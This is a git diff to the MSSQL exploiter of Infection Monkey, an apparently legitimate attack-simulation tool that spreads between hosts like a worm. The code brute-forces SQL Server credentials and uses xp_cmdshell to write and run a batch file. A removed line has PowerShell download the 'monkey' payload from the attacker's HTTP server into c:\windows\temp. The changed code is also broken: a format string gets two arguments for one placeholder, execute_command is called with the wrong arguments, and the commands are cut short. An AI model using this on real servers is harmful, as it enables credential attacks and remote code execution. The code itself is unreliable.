diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 9030433fd..693aaa8f4 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,13 +1,12 @@ import os import logging - +from time import sleep import pymssql from infection_monkey.exploit import HostExploiter, mssqlexec_utils, tools from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.tools import HTTPTools from infection_monkey.config import WormConfiguration -from infection_monkey.model import RDP_CMDLINE_HTTP __author__ = 'Maor Rayzin' @@ -55,14 +54,22 @@ class MSSQLExploiter(HostExploiter): if not self.create_payload_file(payload_path): return False - if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list, - payload_path): - LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr)) - return True - else: + cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list) + if not cursor: LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) return False + def execute_command(self, cursor, cmds): + try: + # Running the cmd on remote host + for cmd in cmds: + cursor.execute(cmd) + sleep(0.5) + except Exception as e: + LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True) + return False + return True + def handle_payload(self, cursor, payload): """ Handles the process of payload sending and execution, prepares the attack and details. @@ -93,15 +100,15 @@ class MSSQLExploiter(HostExploiter): # TODO choose bit version dst_path = WormConfiguration.dropper_target_path_win_64 dst_path = "c:\\windows\\temp\\monkey64.exe" - - command = RDP_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': dst_path} LOG.info("Started http server on %s", http_path) tmp_file_path = "c:\\windows\\temp\\monkey_tmp.bat" - commands = [r"xp_cmdshell 'echo powershell (new-object System.Net.WebClient).DownloadFile(\" > %s'" % tmp_file_path] - commands2 = [r"xp_cmdshell 'echo powershell >> c:\\windows\\temp\\temp.bat'"] + commands = ["xp_cmdshell \"%s\"" % tmp_file_path, + "xp_cmdshell \">%s\"" % (http_path, tmp_file_path), + "xp_cmdshell \">%s\"" % (dst_path, tmp_file_path)] + chosen_attack.execute_command(commands) + commands2 = ["exec xp_cmdshell \"%s\"" % tmp_file_path] chosen_attack.execute_command(commands2) - if chosen_attack.send_payload(): LOG.debug('Payload: {0} has been successfully sent to host'.format(payload)) if chosen_attack.execute_payload(): @@ -116,7 +123,7 @@ class MSSQLExploiter(HostExploiter): chosen_attack.cleanup_files() return False - def brute_force_begin(self, host, port, users_passwords_pairs_list, payload): + def brute_force(self, host, port, users_passwords_pairs_list): """ Starts the brute force connection attempts and if needed then init the payload process. Main loop starts here. @@ -124,7 +131,6 @@ class MSSQLExploiter(HostExploiter): Args: host (str): Host ip address port (str): Tcp port that the host listens to - payload (str): Local path to the payload users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with Return: @@ -141,15 +147,7 @@ class MSSQLExploiter(HostExploiter): 'using user: {1}, password: {2}'.format(host, user, password)) self.report_login_attempt(True, user, password) cursor = conn.cursor() - - # Handles the payload and return True or False - if self.handle_payload(cursor, payload): - LOG.debug("Successfully sent and executed payload: {0} on host: {1}".format(payload, host)) - return True - else: - LOG.warning("user: {0} and password: {1}, " - "was able to connect to host: {2} but couldn't handle payload: {3}" - .format(user, password, host, payload)) + return cursor except pymssql.OperationalError: # Combo didn't work, hopping to the next one pass diff --git a/monkey/infection_monkey/exploit/mssqlexec_utils.py b/monkey/infection_monkey/exploit/mssqlexec_utils.py index c45b53eeb..e9f7d616e 100644 --- a/monkey/infection_monkey/exploit/mssqlexec_utils.py +++ b/monkey/infection_monkey/exploit/mssqlexec_utils.py @@ -108,28 +108,8 @@ class CmdShellAttack(AttackHost): self.attacker_ip = get_interface_to_target(host.ip_addr) self.host = host - def execute_command(self, cmds): - ftp_server, ftp_server_p = self.__init_ftp_server(self.host) - if ftp_server_p and ftp_server: - #command = "xp_cmdshell \""+cmd+"\"" - #command = "xp_cmdshell \"C:\\download.bat\"" - #command = "EXEC xp_cmdshell \"c:\\download.bat\"" - try: - # Running the cmd on remote host - for cmd in cmds: - self.cursor.execute(cmd) - sleep(0.5) - except Exception as e: - LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True) - self.ftp_server_p.terminate() - return False - return True - else: - LOG.error("Couldn't establish an FTP server for the dropout") - return False - def send_payload(self): """ Sets up an FTP server and using it to download the payload to the remote host